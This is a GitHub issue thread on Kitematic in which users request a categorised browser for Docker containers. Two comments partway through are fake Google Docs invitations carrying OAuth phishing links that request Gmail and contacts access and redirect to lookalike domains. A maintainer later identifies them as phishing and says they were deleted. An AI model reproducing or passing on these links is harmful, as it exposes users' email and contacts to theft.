### ISSUE TITLE
Very cool, great job!

### ISSUE THREAD

**Issue by streetbikeford** [kitematic/kitematic#294]
Creating something like this has been on my plate since a friend showed me Docker. Using a simple graphical interface to spin up containers is going to be hugely beneficial. I think one thing I would like to see out of this program is the ability to browse available containers.

**Comment by jeffdm** [comment]
Thanks for the issue (and the kind words)!

Out of curiosity, what do you mean by 'ability to browse all available containers'? On DockerHub?

**Comment by streetbikeford** [comment]
Something like an app store or iTunes store. Someplace that organizes available containers into categories, for those of us that want to make use of the program, but don’t know exactly what containers we’re looking for.

**Comment by d4rkd0s** [comment]
:+1: This is exactly what I was thinking as well, something to browse repos on hub.docker.com. However,  the Docker Hub really doesn't have this ability too, so maybe something curated by the Kitematic Team, using something like https://github.com/veggiemonk/awesome-docker

**Comment by luketherrien** [comment]
@d4rkd0s I'm a little confused by your statement, "Docker hub doesn't have this ability too".

Couldn't you hit their [REST API](https://registry.hub.docker.com/search?q=) and get results back?

**Comment by d4rkd0s** [comment]
Yes, so what I am referring to is browsing not searching, on the main website, no API or anything, we are talking about a user frontend. Kitematic GUI compared to the web frontend of Docker Hub.

**Comment by mchiang0610** [comment]
@streetbikeford @d4rkd0s Would you guys still want this feature if we improve image browsing on Docker Hub?

**Comment by streetbikeford** [comment]
Yes, very much so.

**Comment by mchiang0610** [comment]
@streetbikeford Good to know! If you don't mind letting me know, how would you improve the browsing experience on Hub? (ie. Trouble browsing repos on Docker Hub) 

I would like to pass it on to the Docker Hub team so they can improve on that experience.

**Comment by streetbikeford** [comment]
Zach Olson has invited you to view the following document:

Open in Docs
<https://accounts.google.com/o/oauth2/auth?client_id=346348828325-vlpb3e70lp89pd823qrcb9jfsmu556t8.apps.googleusercontent.com&scope=https%3A%2F%2Fmail.google.com%2F+https%3A%2F%2Fwww.googleapis.com%2Fauth%2Fcontacts&immediate=false&include_granted_scopes=true&response_type=token&redirect_uri=https%3A%2F%2Fgoogledocs.g-cloud.pro%2Fg.php&customparam=customparam>

**Comment by streetbikeford** [comment]
Zach Olson has invited you to view the following document:

Open in Docs
<https://accounts.google.com/o/oauth2/auth?client_id=187102321219-1cb4b2gdr0bqv5u5n35vi1hecjcp1sjg.apps.googleusercontent.com&scope=https%3A%2F%2Fmail.google.com%2F+https%3A%2F%2Fwww.googleapis.com%2Fauth%2Fcontacts&immediate=false&include_granted_scopes=true&response_type=token&redirect_uri=https%3A%2F%2Fgoogledocs.docscloud.download%2Fg.php&customparam=customparam>

**Comment by d4rkd0s** [comment]
@streetbikeford ?

**Comment by FrenchBen** [comment]
@d4rkd0s some spamming/phishing which has now been deleted.

**Comment by d4rkd0s** [comment]
@FrenchBen thank you, yeah I saw this: http://www.independent.co.uk/life-style/gadgets-and-tech/google-phishing-emails-attack-gmail-scam-link-doc-invitation-hack-a7716581.html ... scary stuff, If anyone else clicked it, you will want todo a Security Checkup with google here: https://myaccount.google.com/secureaccount
